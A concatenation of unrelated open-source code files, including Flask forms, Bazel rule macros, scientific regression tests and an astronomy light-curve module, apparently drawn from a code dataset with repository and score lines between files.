verbose: Whether this class should output diagnostic messages.
"""
self._compiler_jar = os.path.join(_CURRENT_DIR, "compiler", "compiler.jar")
self._verbose = verbose
def _log_debug(self, msg, error=False):
"""Logs |msg| to stdout if --verbose/-v is passed when invoking this script.
Args:
msg: A debug message to log.
"""
if self._verbose:
print("(INFO) %s" % msg)
def run_jar(self, jar, args):
"""Runs a .jar from the command line with arguments.
Args:
jar: A file path to a .jar file
args: A list of command line arguments to be passed when running the .jar.
Return:
(exit_code, stderr) The exit code of the command (e.g. 0 for success) and
the stderr collected while running |jar| (as a string).
"""
shell_command = " ".join(self._JAR_COMMAND + [jar] + args)
self._log_debug("Running jar: %s" % shell_command)
devnull = open(os.devnull, "w")
process = subprocess.Popen(shell_command, universal_newlines=True,
shell=True, stdout=devnull,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
return process.returncode, stderr
| 2.1875 | 2 |
app/main/forms.py | CheboiDerrick/flask-blog-app | 0 | 12762539 | <gh_stars>0
from flask_wtf import FlaskForm
from wtforms import StringField, SelectField, TextAreaField, SubmitField
from wtforms.validators import Required
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us a little about your awesome self.',validators = [Required()])
submit = SubmitField('Update')
class BlogForm(FlaskForm):
title = StringField('Title', validators=[Required()])
category = SelectField('Category', choices=[('Design','Design'),('Entertainment','Entertainment'),('Fashion & Style','Fashion & Style'),('Photography','Photograpgy'),('Business','Business')],validators=[Required()])
post = TextAreaField('Blog', validators=[Required()])
submit = SubmitField('Post')
class CommentForm(FlaskForm):
comment = TextAreaField('Leave a comment',validators=[Required()])
submit = SubmitField('Add Comment') | 2.65625 | 3 |
week06/02.Generators/cycle.py | TsvetomirTsvetkov/Python-Course-101 | 0 | 12762540 | # cycle.py
def cycle(iterable):
index = 0
length = len(iterable)
while True:
for index in range(length):
yield index
endless = cycle(range(0, 10))
for item in endless:
print(item)
| 3.71875 | 4 |
src/main/starlark/builtins_bzl/common/rule_util.bzl | AyuMol758/bazel | 16,989 | 12762541 | <reponame>AyuMol758/bazel
# Copyright 2021 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines create_rule and create_dep macros"""
def create_rule(impl, attrs = {}, deps = [], fragments = [], remove_attrs = [], **kwargs):
"""Creates a rule composed from dependencies.
Args:
impl: The implementation function of the rule, taking as parameters the
rule ctx followed by the executable function of each dependency
attrs: Dict of attributes required by the rule. These will override any
conflicting attributes specified by dependencies
deps: Dict of name->dependency mappings, with each dependency struct
created using 'create_dep'. The keys of this dict are the parameter
names received by 'impl'
fragments: List of configuration fragments required by the rule
remove_attrs: List of attributes to remove from the implementation.
**kwargs: extra args to be passed for rule creation
Returns:
The composed rule
"""
merged_attrs = dict()
fragments = list(fragments)
merged_mandatory_attrs = []
for dep in deps:
merged_attrs.update(dep.attrs)
fragments.extend(dep.fragments)
merged_mandatory_attrs.extend(dep.mandatory_attrs)
merged_attrs.update(attrs)
for attr in remove_attrs:
if attr in merged_mandatory_attrs:
fail("Cannot remove mandatory attribute %s" % attr)
merged_attrs.pop(attr)
return rule(
implementation = impl,
attrs = merged_attrs,
fragments = fragments,
**kwargs
)
def create_dep(call, attrs = {}, fragments = [], mandatory_attrs = None):
"""Combines a dependency's executable function, attributes, and fragments.
Args:
call: the executable function
attrs: dict of required rule attrs
fragments: list of required configuration fragments
mandatory_attrs: list of attributes that can't be removed later
(when not set, all attributes are mandatory)
Returns:
The struct
"""
return _create_dep(call, attrs, fragments, mandatory_attrs if mandatory_attrs else attrs.keys())
def _create_dep(call, attrs = {}, fragments = [], mandatory_attrs = []):
return struct(
call = call,
attrs = attrs,
fragments = fragments,
mandatory_attrs = mandatory_attrs,
)
def create_composite_dep(merge_func, *deps):
"""Creates a dependency struct from multiple dependencies
Args:
merge_func: The executable function to evaluate the dependencies.
*deps: The dependencies to compose provided as keyword args
Returns:
A dependency struct
"""
merged_attrs = dict()
merged_frags = []
merged_mandatory_attrs = []
for dep in deps:
merged_attrs.update(dep.attrs)
merged_frags.extend(dep.fragments)
merged_mandatory_attrs.extend(dep.mandatory_attrs)
return _create_dep(
call = merge_func,
attrs = merged_attrs,
fragments = merged_frags,
mandatory_attrs = merged_mandatory_attrs,
)
| 1.984375 | 2 |
api/sitesync/__init__.py | pypeclub/openpype4-backend | 2 | 12762542 | __all__ = ["router"]
from sitesync.sitesync import router
| 1.109375 | 1 |
pyne/tests/test_data_checksums.py | AllSafeCyberSecur1ty/Nuclear-Engineering | 1 | 12762543 | <reponame>AllSafeCyberSecur1ty/Nuclear-Engineering<filename>pyne/tests/test_data_checksums.py
""" test data_checksums and hashing functions"""
import os
import warnings
from shutil import copyfile
import nose
from nose.tools import assert_equal, assert_true
from pyne.utils import QAWarning
warnings.simplefilter("ignore", QAWarning)
import pyne
# These tests require nuc_data
if not os.path.isfile(pyne.nuc_data):
raise RuntimeError("Tests require nuc_data.h5. Please run nuc_data_make.")
def test_data_checksums():
from pyne.data import data_checksums
assert_equal(len(data_checksums), 7)
assert_equal(data_checksums["/atomic_mass"], "10edfdc662e35bdfab91beb89285efff")
assert_equal(
data_checksums["/material_library"], "8b10864378fbd88538434679acf908cc"
)
assert_equal(data_checksums["/neutron/eaf_xs"], "29622c636c4a3a46802207b934f9516c")
assert_equal(
data_checksums["/neutron/scattering_lengths"],
"a24d391cc9dc0fc146392740bb97ead4",
)
assert_equal(
data_checksums["/neutron/simple_xs"], "3d6e086977783dcdf07e5c6b0c2416be"
)
assert_equal(data_checksums["/decay"], "4f41f3e46f4306cc44449f08a20922e0")
assert_equal(data_checksums["/dose_factors"], "dafa32c24b2303850a0bebdf3e6b122e")
def test_internal_hashes():
from pyne.dbgen import hashtools
remove_data = False
if os.access(pyne.nuc_data, os.W_OK):
test_data = pyne.nuc_data
else:
# Create a copy so we don't try to modify a file we don't have
# permissions for
test_data = "test_nuc_data.h5"
copyfile(pyne.nuc_data, test_data)
remove_data = True
hashtools.set_internal_hashes(test_data)
for item, val in hashtools.check_internal_hashes(test_data):
assert_true(val)
if remove_data:
os.remove(test_data)
if __name__ == "__main__":
nose.runmodule()
| 2.296875 | 2 |
Week-3/L6/Prob2.py | jabhij/MITx-6.00.1x-PYTHON | 2 | 12762544 | def oddTuples(aTup):
'''
aTup: a tuple
returns: tuple, every other element of aTup.
'''
# using tuple slicing method
return aTup[0: :2]
| 3.609375 | 4 |
tests/test_regression.py | psesh/Efficient-Quadratures | 59 | 12762545 | <gh_stars>10-100
from unittest import TestCase
import unittest
from equadratures import *
from equadratures import datasets
import numpy as np
import scipy.stats as st
class TestC(TestCase):
def test_quadratic(self):
dimensions = 1
M = 12
param = Parameter(distribution='Uniform', lower=0, upper=1., order=2)
myParameters = [param for i in range(dimensions)] # one-line for loop for parameters
x_train = np.asarray([0.0,0.0714,0.1429,0.2857,0.3571,0.4286,0.5714,0.6429,0.7143,0.7857,0.9286,1.0000])
y_train = np.asarray([6.8053,-1.5184,1.6416,6.3543,14.3442,16.4426,18.1953,28.9913,27.2246,40.3759,55.3726,72.0])
x_train = np.reshape(x_train, (M, 1))
y_train = np.reshape(y_train, (M, 1))
myBasis = Basis('univariate')
poly = Poly(myParameters, myBasis, method='least-squares', sampling_args={'sample-points':x_train, 'sample-outputs':y_train})
poly.set_model()
coefficients = poly.get_coefficients().reshape(3, )
true_coefficients = np.asarray([22.47470337, 17.50891379, 4.97964868])
np.testing.assert_array_almost_equal(coefficients, true_coefficients, decimal=4, err_msg='Problem!')
def test_robust(self):
"""
Tests robust regression (huber and least-absolute-residual), with osqp and scipy backends.
"""
methods = ['huber','least-absolute-residual']
opts = ['osqp','scipy']
f = lambda x: (-0.3*x**4 -3*x**3 +0.6*x**2 +2.4*x - 0.5)
N = 50 # number of training points (note, some will be removed below)
n = 4 # degree of polynomial
state = 15 # random seed
# Add some noise
noise_var = 0.1
x = np.sort(np.random.RandomState(state).uniform(-1,1,N))
y = f(x) + np.random.RandomState(state).normal(0,noise_var,size=N).T
# delete training points between 0 < x < 0.3
pos = ((x>0)*(x<0.3)).nonzero()[0]
x = np.delete(x,pos)
y = np.delete(y,pos)
# Add some outliers
randrange = range(10,17)
y[randrange] = y[randrange]+np.random.RandomState(1).normal(0,4**2,len(randrange))
# Test data
x = x.reshape(-1,1)
xtest = np.linspace(-1,1,100).reshape(-1,1)
ytest = f(xtest)
# param and basis
param = Parameter(distribution='uniform', lower=-1, upper=1, order=n)
basis = Basis('univariate')
# Test Poly regressions
for method in methods:
for opt in opts:
if method != 'huber' and opt != 'scipy': # TODO - remove this if statement once scipy huber regression implemented
poly = Poly(parameters=param, basis=basis, method=method,
sampling_args= {'mesh': 'user-defined', 'sample-points':x.reshape(-1,1), 'sample-outputs': y.reshape(-1,1)},
solver_args={'M':0.2**2,'verbose':False,'optimiser':opt})
poly.set_model()
_,r2 = poly.get_polyscore(X_test=xtest,y_test=ytest)
self.assertTrue(r2 > 0.997,msg='Poly method = %a, optimiser = %a' %(method,opt))
def test_ElasticNet_linear(self):
"""
Tests elastic-net regularisation on linear (1st order) synthetic data with irrelevent features. (using cvxpy LP solve here).
"""
# Load linear dataset with n_observations=500,n_dim=10,bias=0.5,n_relevent=2,noise=0.2,train/test split = 0.8
data = np.load('./tests/test_data/linear_data.npz')
X_train = data['X_train']; y_train = data['y_train']; X_test = data['X_test']; y_test = data['y_test']
# Define param and basis
s = Parameter(distribution='uniform', lower=-1, upper=1, order=1,endpoints='both')
param = [s for _ in range(X_train.shape[1])]
basis = Basis('total-order')
# Fit Poly with OLS and Elastic Net (but with lambda=0 so effectively OLS) and check r2 scores match
poly_OLS = Poly(parameters=param, basis=basis, method='least-squares',
sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)})
poly_OLS.set_model()
_,r2_OLS = poly_OLS.get_polyscore(X_test=X_test,y_test=y_test)
poly_EN = poly = Poly(parameters=param, basis=basis, method='elastic-net',
sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)},
solver_args={'path':False,'lambda':0.0,'alpha':0.5})
poly_EN.set_model()
_,r2_EN = poly_EN.get_polyscore(X_test=X_test,y_test=y_test)
np.testing.assert_array_almost_equal(r2_OLS,r2_EN, decimal=4, err_msg='Problem!')
# Now fit Poly with LASSO (alpha = 1.0) and check r2 improved (it should because irrelevent features + noise)
poly_LASSO = Poly(parameters=param, basis=basis, method='elastic-net',
sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)},
solver_args={'path':False,'lambda':0.015,'alpha':1.0})
poly_LASSO.set_model()
_,r2_LASSO = poly_LASSO.get_polyscore(X_test=X_test,y_test=y_test)
self.assertTrue(r2_LASSO > r2_OLS)
# Finally, check LASSO has shrunk irrelevent Poly coefficients
coeffs = poly_LASSO.get_coefficients().squeeze()
ideal_coeffs = 3 #As tensor-grid, order=1, relevent_dims=2
idx = np.abs(coeffs).argsort()[::-1]
irrelevent_coeffs = np.sum(np.abs(coeffs[idx[ideal_coeffs:]]))/np.sum(np.abs(coeffs))
self.assertTrue(irrelevent_coeffs < 1e-5,msg='irrelevent_coeffs = %.2e' %irrelevent_coeffs)
def test_ElasticNet_friedman(self):
"""
Tests elastic-net regularisation on quadratic (2nd order) synthetic data with irrelevent features. (using coord descent here).
"""
# Generate friedman dataset with n_observations=200,n_dim=10,noise=0.2,normalise=False,train/test split of 0.8
data = np.load('./tests/test_data/friedman_data.npz')
X_train = data['X_train']; y_train = data['y_train']; X_test = data['X_test']; y_test = data['y_test']
# Define param and basis
s = Parameter(distribution='uniform', lower=-1, upper=1, order=2,endpoints='both')
param = [s for _ in range(X_train.shape[1])]
basis = Basis('total-order')
# Fit OLS poly
poly_OLS = Poly(parameters=param, basis=basis, method='least-squares',
sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)})
poly_OLS.set_model()
_,r2_OLS = poly_OLS.get_polyscore(X_test=X_test,y_test=y_test)
# Fit Poly with LASSO (alpha = 1.0) and check r2 improved
print('running elastic net')
poly_LASSO = Poly(parameters=param, basis=basis, method='elastic-net',
sampling_args= {'mesh': 'user-defined', 'sample-points':X_train, 'sample-outputs': y_train.reshape(-1,1)},
solver_args={'path':True,'alpha':1.0})
poly_LASSO.set_model()
_,r2_LASSO = poly_LASSO.get_polyscore(X_test=X_test,y_test=y_test)
self.assertTrue(r2_LASSO > r2_OLS)
print(r2_LASSO,r2_OLS)
# Finally, check LASSO has shrunk L1norm of coefficients
coeffs_OLS = poly_OLS.get_coefficients().squeeze()
coeffs_LASSO = poly_LASSO.get_coefficients().squeeze()
l1_OLS = np.linalg.norm(coeffs_OLS,ord=1)
l1_LASSO = np.linalg.norm(coeffs_LASSO,ord=1)
self.assertTrue(l1_LASSO < l1_OLS,msg='l1_LASSO = %.2e, l1_OLS = %.2e' %(l1_LASSO,l1_OLS))
def test_polyuq_empirical(self):
"""
Tests the get poly eq routine when no variance data is given, i.e. when estimating the
empirical variance from training data.
"""
# # Generate data
n = 1
# Load linear dataset with n_observations=500,n_dim=10,bias=0.5,n_relevent=2,noise=0.2,train/test split = 0.8
data = np.load('./tests/test_data/linear_data.npz')
X_train = data['X_train']; y_train = data['y_train']
N,dim = X_train.shape
# Fit poly and approx its variance
param = Parameter(distribution='Uniform', lower=-1, upper=1, order=n)
myParameters = [param for i in range(dim)] # one-line for loop for parameters
myBasis = Basis('total-order')
poly = Poly(myParameters, myBasis, method='least-squares', sampling_args={'sample-points':X_train, 'sample-outputs':y_train.reshape(-1,1)} )
poly.set_model()
y_pred, y_std = poly.get_polyfit(X_train,uq=True)
np.testing.assert_array_almost_equal(y_std.mean(), 0.67484, decimal=5, err_msg='Problem!')
def test_polyuq_prescribed(self):
"""
Tests the get poly uq routine when variance data is given in sampling_args.
"""
# Generate data
dim = 1
n = 5
N = 100
our_function = lambda x: 0.3*x**4 -1.6*x**3 +0.6*x**2 +2.4*x - 0.5
X = np.linspace(-1,1,N)
y = our_function(X)
# Array of prescribed variances at each training data point
# y_var = state.uniform(0.05,0.2,N_train)**2
y_var = 0.1*our_function(X)*X
# Fit poly with prescribed variances
param = Parameter(distribution='Uniform', lower=-1, upper=1, order=n)
myParameters = [param for i in range(dim)] # one-line for loop for parameters
myBasis = Basis('univariate')
poly = Poly(myParameters, myBasis, method='least-squares', sampling_args={'sample-points':X.reshape(-1,1),
'sample-outputs':y.reshape(-1,1),
'sample-output-variances':y_var} )
poly.set_model()
y_pred, y_std = poly.get_polyfit(X,uq=True)
np.testing.assert_array_almost_equal(y_std.mean(), 0.64015, decimal=5, err_msg='Problem!')
if __name__== '__main__':
unittest.main()
| 2.28125 | 2 |
unit_testing_course/lesson1/task1/task.py | behzod/pycharm-courses | 213 | 12762546 | # TODO: type solution here
| 1.046875 | 1 |
hendrics/lcurve.py | StingraySoftware/HENDRICS | 18 | 12762547 | <reponame>StingraySoftware/HENDRICS
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Light curve-related functions."""
import os
import warnings
import copy
from astropy import log
import numpy as np
from astropy.logger import AstropyUserWarning
from stingray.lightcurve import Lightcurve
from stingray.utils import assign_value_if_none
from stingray.gti import create_gti_mask, cross_gtis, contiguous_regions
from .base import (
_look_for_array_in_array,
hen_root,
mkdir_p,
interpret_bintime,
)
from .io import load_events, save_lcurve, load_lcurve
from .io import HEN_FILE_EXTENSION, high_precision_keyword_read, get_file_type
from .base import deorbit_events
def join_lightcurve_objs(lclist):
"""Join light curves.
Light curves from different instruments are put in different channels.
Light curves from the same time interval and instrument raise
a ValueError.
Parameters
----------
lclist : list of :class:`Lightcurve` objects
The list of light curves to join
Returns
-------
lcoutlist : joint light curves, one per instrument
See Also
--------
scrunch_lightcurves : Create a single light curve from input light
curves.
Examples
--------
>>> lcA = Lightcurve(np.arange(4), np.zeros(4))
>>> lcA.instr='BU' # Test also case sensitivity
>>> lcB = Lightcurve(np.arange(4) + 4, [1, 3, 4, 5])
>>> lcB.instr='bu'
>>> lcC = join_lightcurve_objs((lcA, lcB))
>>> np.all(lcC['bu'].time == np.arange(8))
True
>>> np.all(lcC['bu'].counts == [0, 0, 0, 0, 1, 3, 4, 5])
True
"""
# --------------- Check consistency of data --------------
lcdts = [lcdata.dt for lcdata in lclist]
# Find unique elements. If multiple bin times are used, throw an exception
lcdts = list(set(lcdts))
assert len(lcdts) == 1, "Light curves must have same dt for joining"
instrs = [
lcdata.instr.lower()
for lcdata in lclist
if (hasattr(lcdata, "instr") and lcdata.instr is not None)
]
# Find unique elements. A lightcurve will be produced for each instrument
instrs = list(set(instrs))
if instrs == []:
instrs = ["unknown"]
outlcs = {}
for instr in instrs:
outlcs[instr.lower()] = None
# -------------------------------------------------------
for lcdata in lclist:
instr = assign_value_if_none(lcdata.instr, "unknown").lower()
if outlcs[instr] is None:
outlcs[instr] = lcdata
else:
outlcs[instr] = outlcs[instr].join(lcdata)
return outlcs
def join_lightcurves(lcfilelist, outfile="out_lc" + HEN_FILE_EXTENSION):
"""Join light curves from different files.
Light curves from different instruments are put in different channels.
Parameters
----------
lcfilelist : list of str
List of input file names
outfile :
Output light curve
See Also
--------
scrunch_lightcurves : Create a single light curve from input light
curves.
"""
lcdatas = []
for lfc in lcfilelist:
log.info("Loading file %s..." % lfc)
lcdata = load_lcurve(lfc)
log.info("Done.")
lcdatas.append(lcdata)
del lcdata
outlcs = join_lightcurve_objs(lcdatas)
if outfile is not None:
instrs = list(outlcs.keys())
for instr in instrs:
if len(instrs) == 1:
tag = ""
else:
tag = instr
log.info("Saving joined light curve to %s" % outfile)
dname, fname = os.path.split(outfile)
save_lcurve(outlcs[instr], os.path.join(dname, tag + fname))
return outlcs
def scrunch_lightcurve_objs(lclist):
"""Create a single light curve from input light curves.
Light curves are appended when they cover different times, and summed when
they fall in the same time range. This is done regardless of the channel
or the instrument.
Parameters
----------
lcfilelist : list of :class:`stingray.lightcurve.Lightcurve` objects
The list of light curves to scrunch
Returns
-------
lc : scrunched light curve
See Also
--------
join_lightcurves : Join light curves from different files
Examples
--------
>>> lcA = Lightcurve(np.arange(4), np.ones(4))
>>> lcA.instr='bu1'
>>> lcB = Lightcurve(np.arange(4), [1, 3, 4, 5])
>>> lcB.instr='bu2'
>>> lcC = scrunch_lightcurve_objs((lcA, lcB))
>>> np.all(lcC.time == np.arange(4))
True
>>> np.all(lcC.counts == [2, 4, 5, 6])
True
>>> np.all(lcC.instr == 'bu1,bu2')
True
"""
instrs = [lc.instr for lc in lclist]
gti_lists = [lc.gti for lc in lclist]
gti = cross_gtis(gti_lists)
for lc in lclist:
lc.gti = gti
if hasattr(lc, "_apply_gtis"): # pragma: no cover
# Compatibility with old versions of stingray
lc.apply_gtis = lc._apply_gtis
lc.apply_gtis()
# Determine limits
lc0 = lclist[0]
for lc in lclist[1:]:
lc0 = lc0 + lc
lc0.instr = ",".join(instrs)
return lc0
def scrunch_lightcurves(
lcfilelist, outfile="out_scrlc" + HEN_FILE_EXTENSION, save_joint=False
):
"""Create a single light curve from input light curves.
Light curves are appended when they cover different times, and summed when
they fall in the same time range. This is done regardless of the channel
or the instrument.
Parameters
----------
lcfilelist : list of str
The list of light curve files to scrunch
Returns
-------
time : array-like
The time array
lc :
The new light curve
gti : [[gti0_0, gti0_1], [gti1_0, gti1_1], ...]
Good Time Intervals
Other Parameters
----------------
outfile : str
The output file name
save_joint : bool
If True, save the per-channel joint light curves
See Also
--------
join_lightcurves : Join light curves from different files
"""
if save_joint:
lcdata = join_lightcurves(lcfilelist)
else:
lcdata = join_lightcurves(lcfilelist, outfile=None)
lc0 = scrunch_lightcurve_objs(list(lcdata.values()))
log.info("Saving scrunched light curve to %s" % outfile)
save_lcurve(lc0, outfile)
return lc0
def filter_lc_gtis(
lc, safe_interval=None, delete=False, min_length=0, return_borders=False
):
"""Filter a light curve for GTIs.
Parameters
----------
lc : :class:`Lightcurve` object
The input light curve
Returns
-------
newlc : :class:`Lightcurve` object
The output light curve
borders : [[i0_0, i0_1], [i1_0, i1_1], ...], optional
The indexes of the light curve corresponding to the borders of the
GTIs. Returned if return_borders is set to True
Other Parameters
----------------
safe_interval : float or [float, float]
Seconds to filter out at the start and end of each GTI. If single
float, these safe windows are equal, otherwise the two numbers refer
to the start and end of the GTI respectively
delete : bool
If delete is True, the intervals outside of GTIs are filtered out from
the light curve. Otherwise, they are set to zero.
min_length : float
Minimum length of GTI. GTIs below this length will be removed.
return_borders : bool
If True, return also the indexes of the light curve corresponding to
the borders of the GTIs
"""
mask, newgtis = create_gti_mask(
lc.time,
lc.gti,
return_new_gtis=True,
safe_interval=safe_interval,
min_length=min_length,
)
nomask = np.logical_not(mask)
newlc = copy.copy(lc)
newlc.counts[nomask] = 0
newlc.gti = newgtis
if return_borders:
mask = create_gti_mask(lc.time, newgtis)
borders = contiguous_regions(mask)
return newlc, borders
else:
return newlc
def lcurve_from_events(
f,
safe_interval=0,
pi_interval=None,
e_interval=None,
min_length=0,
gti_split=False,
ignore_gtis=False,
bintime=1.0,
outdir=None,
outfile=None,
noclobber=False,
deorbit_par=None,
):
"""Bin an event list in a light curve.
Parameters
----------
f : str
Input event file name
bintime : float
The bin time of the output light curve
Returns
-------
outfiles : list
List of output light curves
Other Parameters
----------------
safe_interval : float or [float, float]
Seconds to filter out at the start and end of each GTI. If single
float, these safe windows are equal, otherwise the two numbers refer
to the start and end of the GTI respectively
pi_interval : [int, int]
PI channel interval to select. Default None, meaning that all PI
channels are used
e_interval : [float, float]
Energy interval to select (only works if event list is calibrated with
`calibrate`). Default None
min_length : float
GTIs below this length will be filtered out
gti_split : bool
If True, create one light curve for each good time interval
ignore_gtis : bool
Ignore good time intervals, and get a single light curve that includes
possible gaps
outdir : str
Output directory
outfile : str
Output file
noclobber : bool
If True, do not overwrite existing files
"""
log.info("Loading file %s..." % f)
evdata = load_events(f)
log.info("Done.")
deorbit_tag = ""
if deorbit_par is not None:
evdata = deorbit_events(evdata, deorbit_par)
deorbit_tag = "_deorb"
bintime = np.longdouble(interpret_bintime(bintime))
tag = ""
gtis = evdata.gti
tstart = np.min(gtis)
tstop = np.max(gtis)
events = evdata.time
if hasattr(evdata, "instr") and evdata.instr is not None:
instr = evdata.instr
else:
instr = "unknown"
if ignore_gtis:
gtis = np.array([[tstart, tstop]])
evdata.gtis = gtis
total_lc = evdata.to_lc(100)
total_lc.instr = instr
# Then, apply filters
if pi_interval is not None and np.all(np.array(pi_interval) > 0):
pis = evdata.pi
good = np.logical_and(pis > pi_interval[0], pis <= pi_interval[1])
events = events[good]
tag = "_PI%g-%g" % (pi_interval[0], pi_interval[1])
elif e_interval is not None and np.all(np.array(e_interval) > 0):
if not hasattr(evdata, "energy") or evdata.energy is None:
raise ValueError(
"No energy information is present in the file."
+ " Did you run HENcalibrate?"
)
es = evdata.energy
good = np.logical_and(es > e_interval[0], es <= e_interval[1])
events = events[good]
tag = "_E%g-%g" % (e_interval[0], e_interval[1])
else:
pass
if tag != "":
save_lcurve(
total_lc,
hen_root(f) + "_std_lc" + deorbit_tag + HEN_FILE_EXTENSION,
)
# Assign default value if None
outfile = assign_value_if_none(
outfile, hen_root(f) + tag + deorbit_tag + "_lc"
)
# Take out extension from name, if present, then give extension. This
# avoids multiple extensions
outfile = outfile.replace(HEN_FILE_EXTENSION, "") + HEN_FILE_EXTENSION
outdir = assign_value_if_none(outdir, os.path.dirname(os.path.abspath(f)))
_, outfile = os.path.split(outfile)
mkdir_p(outdir)
outfile = os.path.join(outdir, outfile)
if noclobber and os.path.exists(outfile):
warnings.warn(
"File exists, and noclobber option used. Skipping",
AstropyUserWarning,
)
return [outfile]
lc = Lightcurve.make_lightcurve(
events,
bintime,
tstart=tstart,
tseg=tstop - tstart,
mjdref=evdata.mjdref,
gti=gtis,
)
lc.instr = instr
lc.e_interval = e_interval
lc = filter_lc_gtis(
lc, safe_interval=safe_interval, delete=False, min_length=min_length
)
if len(lc.gti) == 0:
warnings.warn(
"No GTIs above min_length ({0}s) found.".format(min_length)
)
return
lc.header = None
if hasattr(evdata, "header"):
lc.header = evdata.header
if gti_split:
lcs = lc.split_by_gti()
outfiles = []
for ib, l0 in enumerate(lcs):
local_tag = tag + "_gti{:03d}".format(ib)
outf = hen_root(outfile) + local_tag + "_lc" + HEN_FILE_EXTENSION
if noclobber and os.path.exists(outf):
warnings.warn(
"File exists, and noclobber option used. Skipping"
)
outfiles.append(outf)
l0.instr = lc.instr
l0.header = lc.header
save_lcurve(l0, outf)
outfiles.append(outf)
else:
log.info("Saving light curve to %s" % outfile)
save_lcurve(lc, outfile)
outfiles = [outfile]
# For consistency in return value
return outfiles
def lcurve_from_fits(
fits_file,
gtistring="GTI",
timecolumn="TIME",
ratecolumn=None,
ratehdu=1,
fracexp_limit=0.9,
outfile=None,
noclobber=False,
outdir=None,
):
"""
Load a lightcurve from a fits file and save it in HENDRICS format.
.. note ::
FITS light curve handling is still under testing.
Absolute times might be incorrect depending on the light curve format.
Parameters
----------
fits_file : str
File name of the input light curve in FITS format
Returns
-------
outfile : [str]
Returned as a list with a single element for consistency with
`lcurve_from_events`
Other Parameters
----------------
gtistring : str
Name of the GTI extension in the FITS file
timecolumn : str
Name of the column containing times in the FITS file
ratecolumn : str
Name of the column containing rates in the FITS file
ratehdu : str or int
Name or index of the FITS extension containing the light curve
fracexp_limit : float
Minimum exposure fraction allowed
outfile : str
Output file name
noclobber : bool
If True, do not overwrite existing files
"""
warnings.warn(
"""WARNING! FITS light curve handling is still under testing.
Absolute times might be incorrect."""
)
# TODO:
# treat consistently TDB, UTC, TAI, etc. This requires some documentation
# reading. For now, we assume TDB
from astropy.io import fits as pf
from astropy.time import Time
import numpy as np
from stingray.gti import create_gti_from_condition
outfile = assign_value_if_none(outfile, hen_root(fits_file) + "_lc")
outfile = outfile.replace(HEN_FILE_EXTENSION, "") + HEN_FILE_EXTENSION
outdir = assign_value_if_none(
outdir, os.path.dirname(os.path.abspath(fits_file))
)
_, outfile = os.path.split(outfile)
mkdir_p(outdir)
outfile = os.path.join(outdir, outfile)
if noclobber and os.path.exists(outfile):
warnings.warn(
"File exists, and noclobber option used. Skipping",
AstropyUserWarning,
)
return [outfile]
lchdulist = pf.open(fits_file)
lctable = lchdulist[ratehdu].data
# Units of header keywords
tunit = lchdulist[ratehdu].header["TIMEUNIT"]
try:
mjdref = high_precision_keyword_read(
lchdulist[ratehdu].header, "MJDREF"
)
mjdref = Time(mjdref, scale="tdb", format="mjd")
except Exception:
mjdref = None
try:
instr = lchdulist[ratehdu].header["INSTRUME"]
except Exception:
instr = "EXTERN"
# ----------------------------------------------------------------
# Trying to comply with all different formats of fits light curves.
# It's a madness...
try:
tstart = high_precision_keyword_read(
lchdulist[ratehdu].header, "TSTART"
)
tstop = high_precision_keyword_read(lchdulist[ratehdu].header, "TSTOP")
except Exception:
raise (Exception("TSTART and TSTOP need to be specified"))
# For nulccorr lcs this whould work
timezero = high_precision_keyword_read(
lchdulist[ratehdu].header, "TIMEZERO"
)
# Sometimes timezero is "from tstart", sometimes it's an absolute time.
# This tries to detect which case is this, and always consider it
# referred to tstart
timezero = assign_value_if_none(timezero, 0)
# for lcurve light curves this should instead work
if tunit == "d":
# TODO:
# Check this. For now, I assume TD (JD - 2440000.5).
# This is likely wrong
timezero = Time(2440000.5 + timezero, scale="tdb", format="jd")
tstart = Time(2440000.5 + tstart, scale="tdb", format="jd")
tstop = Time(2440000.5 + tstop, scale="tdb", format="jd")
# if None, use NuSTAR defaulf MJDREF
mjdref = assign_value_if_none(
mjdref,
Time(
np.longdouble("55197.00076601852"), scale="tdb", format="mjd"
),
)
timezero = (timezero - mjdref).to("s").value
tstart = (tstart - mjdref).to("s").value
tstop = (tstop - mjdref).to("s").value
if timezero > tstart:
timezero -= tstart
time = np.array(lctable.field(timecolumn), dtype=np.longdouble)
if time[-1] < tstart:
time += timezero + tstart
else:
time += timezero
try:
dt = high_precision_keyword_read(lchdulist[ratehdu].header, "TIMEDEL")
if tunit == "d":
dt *= 86400
except Exception:
warnings.warn(
"Assuming that TIMEDEL is the median difference between the"
" light curve times",
AstropyUserWarning,
)
dt = np.median(np.diff(time))
# ----------------------------------------------------------------
ratecolumn = assign_value_if_none(
ratecolumn,
_look_for_array_in_array(["RATE", "RATE1", "COUNTS"], lctable.names),
)
rate = np.array(lctable.field(ratecolumn), dtype=float)
try:
rate_e = np.array(lctable.field("ERROR"), dtype=np.longdouble)
except Exception:
rate_e = np.zeros_like(rate)
if "RATE" in ratecolumn:
rate *= dt
rate_e *= dt
try:
fracexp = np.array(lctable.field("FRACEXP"), dtype=np.longdouble)
except Exception:
fracexp = np.ones_like(rate)
good_intervals = (
(rate == rate) * (fracexp >= fracexp_limit) * (fracexp <= 1)
)
rate[good_intervals] /= fracexp[good_intervals]
rate_e[good_intervals] /= fracexp[good_intervals]
rate[np.logical_not(good_intervals)] = 0
try:
gtitable = lchdulist[gtistring].data
gti_list = np.array(
[
[a, b]
for a, b in zip(
gtitable.field("START"), gtitable.field("STOP")
)
],
dtype=np.longdouble,
)
except Exception:
gti_list = create_gti_from_condition(time, good_intervals)
lchdulist.close()
lc = Lightcurve(
time=time,
counts=rate,
err=rate_e,
gti=gti_list,
mjdref=mjdref.mjd,
dt=dt,
)
lc.instr = instr
lc.header = lchdulist[ratehdu].header.tostring()
